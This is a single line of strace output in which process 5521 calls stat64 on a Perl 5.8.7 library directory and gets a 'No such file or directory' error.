5521  07:09:24.890790 stat64("/usr/local/lib/perl/5.8.7", 0xbfcd2f80) = -1 ENOENT (No such file or directory)

